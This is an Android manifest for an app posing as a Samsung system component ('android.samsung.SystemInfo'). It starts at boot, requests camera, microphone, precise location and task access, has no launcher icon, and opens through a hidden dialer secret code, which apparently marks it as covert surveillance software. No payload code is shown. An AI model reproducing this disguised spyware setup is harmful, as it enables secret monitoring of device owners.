<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="15" android:versionName="4.0.4-FH13" package="android.samsung.SystemInfo"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="15" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.SET_WALLPAPER" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.WRITE_OWNER_DATA" />
    <uses-permission android:name="android.permission.READ_OWNER_DATA" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <permissions>
        <permission android:name="android.permission.WRITE_EXTERNAL_STORAGE">
            <group gid="sdcard_rw" />
        </permission>
    </permissions>
    <application android:label="@string/app_name" android:icon="@drawable/icon">
        <service android:name="SystemInfoService" android:enabled="true" android:exported="true" android:process="@string/process_name">
            <intent-filter>
                <action android:name="android.samsung.SystemInfo" />
            </intent-filter>
        </service>
        <receiver android:name="SystemInfoReceiver">
            <intent-filter android:priority="100">
                <action android:name="android.provider.Telephony.SECRET_CODE" />
                <data android:scheme="android_secret_code" android:host="46744674" />
            </intent-filter>
        </receiver>
    </application>
</manifest>
